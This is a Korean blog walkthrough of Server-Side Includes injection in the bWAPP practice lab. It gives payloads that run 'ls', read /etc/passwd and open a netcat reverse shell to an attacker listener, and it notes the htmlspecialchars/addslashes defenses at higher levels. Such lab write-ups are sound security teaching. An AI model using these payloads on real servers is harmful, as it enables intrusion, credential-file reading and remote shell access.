Server-Side Includes (SSI) Injection
Server-Side Includes (SSI) Injection
SSI(Server-Side Includes)는 웹페이지 내에서 주로 방문자 수를 세거나 홈페이지의 로고를 수정하는 간단한 기능을 추가할 때 사용됩니다.
- Low 레벨 -
First name과 Last name이 존재하는 것을 확인
값을 입력하면 ssi.shtml 페이지를 호출하는데 SSI 기능을 사용한다는 사실이 확인가능하다.
자신의 ip를 출력해주는것을 확인할 수 있다.
vi ssii.php
ssii.php를 참조하고있으므로 해당 php의 소스코드를 봤다.
따로 필터링은 존재하지않고 있다.
- Low 레벨 결과 및 입력 값 1 -
<!--#exec cmd="ls" -->
ls 명령어가 출력되는 것을 확인이 가능하다.
- Low 레벨 결과 및 입력 값 2 -
<!--#exec cmd="cat /etc/passwd"-->
/etc/passwd를 성공시켰다.
- Low 레벨 결과 및 입력 값 3 -
<!--#exec cmd="nc 192.168.1.82 7777 -e /bin/bash"
이번에도 netcat을 활용하여 쉘을 획득하여보자
[ 공격자 ]
nc -lvp 7777
칼리에서 쉘을 획득할 수 있었으며, ssi injection에 성공하였다.
- Medium 레벨과 High 레벨 -
vi functions_external.php
xss_check_ 3와 xss_check_ 4 에서는
htmlspecialchars 함수와 addslashes함수를 이용하여, 대응 하는 것을 확인할 수 있습니다.
'Web hacking' 카테고리의 다른 글
| bWAPP 13. SQL Injection (GET/Select) (0) | 2022.02.06 |
|---|---|
| bWAPP 12. SQL Injection (GET/Search) (0) | 2022.02.06 |
| bWAPP 10. PHP Code Injection (0) | 2022.02.04 |
| bWAPP 9. OS Command Injection - Blind (0) | 2022.02.04 |
| bWAPP 8. OS Command Injection (0) | 2022.02.01 |